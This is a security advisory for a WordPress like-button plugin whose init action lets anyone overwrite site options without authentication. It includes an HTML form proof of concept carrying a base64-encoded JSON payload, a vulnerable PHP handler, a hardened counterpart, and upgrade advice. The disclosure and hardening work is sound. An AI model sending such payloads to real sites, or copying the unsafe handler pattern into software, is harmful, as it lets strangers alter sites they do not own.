Advisory:

Like Button Rating ♥ LikeBtn allows anybody to set any option

Vulnerability

Last revised:

In the init action, this plugin checks whether $_POST['likebtn_import_config'] is empty. If it is not, the plugin base64-decodes the string, parses the result as JSON, and writes the decoded values into WordPress options, with no check on who sent the request.
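To make the flaw and its fix concrete, here is an added illustration of the pattern the advisory describes next to a hardened version of the same handler. This is example code written for this page, not the plugin's own source; the function names, the nonce action and field names, and the assumption that all of the plugin's own option names start with "likebtn_" are hypothetical. The payload shape (a top-level "likebtn_settings_options" group containing option names) is taken from the proof of concept below.

```php
<?php
// Added example, not the plugin's code. Assumptions: the plugin's own
// option names share the 'likebtn_' prefix, and imports are only ever
// submitted from the plugin's settings page (hypothetical nonce names).

// Pattern described in the advisory: on 'init', any POST carrying
// likebtn_import_config is decoded and written straight into options.
// Nothing checks who sent the request, so an anonymous visitor can
// set any option (the PoC sets 'blogname', the Site Title).
function likebtn_import_config_unsafe() {
    if ( empty( $_POST['likebtn_import_config'] ) ) {
        return;
    }
    $config = json_decode( base64_decode( $_POST['likebtn_import_config'] ), true );
    foreach ( (array) $config as $group => $options ) {
        foreach ( (array) $options as $name => $value ) {
            update_option( $name, $value ); // attacker-chosen name and value
        }
    }
}

// Hardened version: admin area only, administrator only, CSRF nonce,
// strict decoding, and an allow-list of option names.
function likebtn_import_config_safe() {
    if ( ! is_admin() || empty( $_POST['likebtn_import_config'] ) ) {
        return;
    }
    // Capability check: only users allowed to manage options may import.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // CSRF check: the form must carry a nonce created for this action
    // (hypothetical action and field names).
    check_admin_referer( 'likebtn_import_config', 'likebtn_import_nonce' );

    // Strict base64 (rejects stray characters) and strict JSON handling.
    $raw     = base64_decode( wp_unslash( $_POST['likebtn_import_config'] ), true );
    $config  = ( false === $raw ) ? null : json_decode( $raw, true );
    if ( ! is_array( $config ) || ! isset( $config['likebtn_settings_options'] )
         || ! is_array( $config['likebtn_settings_options'] ) ) {
        wp_die( 'Invalid import payload.' );
    }

    foreach ( $config['likebtn_settings_options'] as $name => $value ) {
        // Allow-list by namespace: drop anything outside the plugin's
        // own options, so core options such as 'blogname' cannot be set.
        if ( ! is_string( $name ) || 0 !== strpos( $name, 'likebtn_' ) ) {
            continue;
        }
        // Accept scalar values only and sanitize them before storing.
        if ( ! is_scalar( $value ) ) {
            continue;
        }
        update_option( $name, sanitize_text_field( (string) $value ) );
    }
}
add_action( 'admin_init', 'likebtn_import_config_safe' );
```

Against the proof of concept below, the hardened handler never reaches update_option: an anonymous request fails the capability check first, and even an administrator's request with that payload drops "blogname" because it is outside the plugin's option namespace.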

Current state: Reported

CVSS Summary

CVSS base scores for this vulnerability:

  Score            6.4 (Medium)
  Vector           Network
  Complexity       Low
  Authentication   None
  Confidentiality  Partial
  Integrity        Partial
  Availability     None
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

The form below will set the “Site Title” option to “Temmie”:

  <form method="POST" action="http://localhost/">
    <input type="text" name="likebtn_import_config" value="ewogICJsaWtlYnRuX3NldHRpbmdzX29wdGlvbnMiOiB7CiAgICAiYmxvZ25hbWUiOiAiVGVtbWllIgogIH0KfQo=">
    <input type="submit">
  </form>

This works whether you’re logged in or not. The base64-encoded JSON above decodes to:

  {
    "likebtn_settings_options": {
      "blogname": "Temmie"
    }
  }

Advisory timeline

  • 2017-10-27: Discovered
  • 2017-11-02: Reported to vendor via email
  • 2017-11-02: Vendor reported fixed
  • 2018-04-10: Advisory published

Mitigation/further actions

Upgrade to version 2.5.4 or later.